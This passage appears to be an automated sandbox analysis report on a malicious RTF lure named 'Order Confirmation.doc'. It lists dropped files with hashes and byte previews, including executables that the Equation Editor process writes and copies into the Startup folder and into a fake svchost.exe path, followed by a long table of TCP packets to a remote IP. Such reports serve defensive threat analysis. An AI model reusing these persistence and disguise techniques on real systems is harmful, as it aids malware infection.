                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UI75F9NF84855HK14GCX.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VP5RMEAM820NYLIJBLCO.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W7G4NZK9VZA0YTK60A14.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                                                          Process:C:\Users\user\AppData\Roaming\srt.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3777536
                                                                                          Entropy (8bit):2.5622413210602293
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                                                          MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                                                          SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                                                          SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............"...0...9.........~.9.. ....9...@.. ........................:...........`.................................$.9.W.....9.@.....................9...................................................... ............... ..H............text.....9.. ....9................. ..`.rsrc...@.....9.......9.............@..@.reloc........9.......9.............@..B................`.9.....H........$....9..........................................................*".(.....*..(........}......}.......( ...}.......}....*".(.....*....0..8..........rx..p..r.q9p.......%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%..r.q9p.(#........+3+... .......o..........(.....(....o.......X.....X......o....2........%.. .o.....s............+L..........o...........,.+,..r)..p(........,.+...(....(.........o.........X.......i2..o.........(.....*.0..............
                                                                                          C:\Users\user\AppData\Roaming\srt.exe
                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3777536
                                                                                          Entropy (8bit):2.5622413210602293
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                                                          MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                                                          SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                                                          SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............"...0...9.........~.9.. ....9...@.. ........................:...........`.................................$.9.W.....9.@.....................9...................................................... ............... ..H............text.....9.. ....9................. ..`.rsrc...@.....9.......9.............@..@.reloc........9.......9.............@..B................`.9.....H........$....9..........................................................*".(.....*..(........}......}.......( ...}.......}....*".(.....*....0..8..........rx..p..r.q9p.......%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%..r.q9p.(#........+3+... .......o..........(.....(....o.......X.....X......o....2........%.. .o.....s............+L..........o...........,.+,..r)..p(........,.+...(....(.........o.........X.......i2..o.........(.....*.0..............
                                                                                          C:\Users\user\Desktop\~$der Confirmation.doc
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):162
                                                                                          Entropy (8bit):2.431160061181642
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                          MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                          SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                          SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                          SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                          Malicious:false
                                                                                          Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                          C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                                                          Process:C:\Users\user\AppData\Roaming\srt.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3777536
                                                                                          Entropy (8bit):2.5622413210602293
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                                                          MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                                                          SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                                                          SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............"...0...9.........~.9.. ....9...@.. ........................:...........`.................................$.9.W.....9.@.....................9...................................................... ............... ..H............text.....9.. ....9................. ..`.rsrc...@.....9.......9.............@..@.reloc........9.......9.............@..B................`.9.....H........$....9..........................................................*".(.....*..(........}......}.......( ...}.......}....*".(.....*....0..8..........rx..p..r.q9p.......%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%..r.q9p.(#........+3+... .......o..........(.....(....o.......X.....X......o....2........%.. .o.....s............+L..........o...........,.+,..r)..p(........,.+...(....(.........o.........X.......i2..o.........(.....*.0..............

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:Rich Text Format data, unknown version
                                                                                          Entropy (8bit):4.315318660428387
                                                                                          TrID:
                                                                                          • Rich Text Format (5005/1) 55.56%
                                                                                          • Rich Text Format (4004/1) 44.44%
                                                                                          File name:Order Confirmation.doc
                                                                                          File size:4964
                                                                                          MD5:afb651b6577eb5a0b605f1cf56e807cc
                                                                                          SHA1:102cd8cc2da158ce562287af707c1da088e92025
                                                                                          SHA256:0187fc0bc8addf4a9dcaf818471743ff9f75d531d341863c74af74f95b3c29f0
                                                                                          SHA512:ed4630e9102995154608fb011ebfc469f2942cbf02c9834caea53e88ba7361507b62ab7409b4e0ea33e9ce49ab2a73ceac84d4ad34445696b18ddb7377bef2b2
                                                                                          SSDEEP:96:c3SMC7k1O0kkMAfnvNqJxlmaPsQ20/89yN+/32e7cfRTbw:oSMCUO0N9fvNQxQ+sQ20EcN82eKRTbw
                                                                                          File Content Preview:{\rtf2267{\object37732527 37732527 \'' \objautlink25073782\~\objupdate1434262714342627 \objw4254\objh6162{\*\objdata96259 {{{{{{{{{{{{{{{{{{{{{

                                                                                          File Icon

                                                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                                                          Static RTF Info

                                                                                          Objects

                                                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                          00000013Ehno
                                                                                          1000000E5h2embeddedeQUAtIOn.32096no

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          May 27, 2021 21:33:12.993962049 CEST4916580192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.035825014 CEST8049165162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.036015987 CEST4916580192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.036190987 CEST4916580192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.077934980 CEST8049165162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.114624023 CEST8049165162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.118063927 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.161191940 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.161354065 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.165724993 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.207585096 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.213485956 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.213522911 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.213546991 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.213645935 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.225444078 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.267304897 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.268479109 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.308850050 CEST4916580192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.480428934 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.520487070 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.520617008 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.540823936 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.584558010 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.617490053 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.617521048 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.617546082 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.617563009 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.617585897 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.617600918 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.617701054 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.617856026 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.617891073 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.617892981 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.617945910 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.618885040 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.618916035 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.618964911 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.619865894 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.619896889 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.619946003 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.620872974 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.620901108 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.620951891 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.621862888 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.621890068 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.621944904 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.622840881 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.622868061 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.622920036 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.623783112 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.623812914 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.623882055 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.624799013 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.624829054 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.624881029 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.625776052 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.625802994 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.625865936 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.626728058 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.626755953 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.626847982 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.627728939 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.627758026 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.627821922 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.628850937 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.628880978 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.628941059 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.629678965 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.629707098 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.629776001 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.630644083 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.630673885 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.630736113 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.659483910 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.659514904 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.659684896 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.659841061 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.659858942 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.659928083 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.660856009 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.660876036 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.660959959 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.661848068 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.661868095 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.661936998 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.662898064 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.662915945 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.662982941 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.663793087 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.663810015 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.663865089 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.664773941 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.664793968 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.664871931 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.665774107 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.665795088 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.665864944 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.666765928 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.666784048 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.666842937 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.667752981 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.667772055 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.667836905 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.668700933 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.668721914 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.668800116 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.669712067 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.669734001 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.669785023 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.670630932 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.670650959 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.670705080 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.671639919 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.671658039 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.671714067 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.672821999 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.672842026 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.672894955 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.673666000 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.673691988 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.673764944 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.674588919 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.674607038 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.674670935 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.675604105 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.675622940 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.675678968 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.676522970 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.676542997 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.676593065 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.677541971 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.677561045 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.677622080 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.678517103 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.678549051 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.678601980 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.679529905 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.679548979 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.679605007 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.680485964 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.680505037 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.680557966 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.681442976 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.681461096 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.681519032 CEST49166443192.168.2.22162.159.130.233
                                                                                          May 27, 2021 21:33:13.701476097 CEST44349166162.159.130.233192.168.2.22
                                                                                          May 27, 2021 21:33:13.701504946 CEST44349166162.159.130.233192.168.2.22
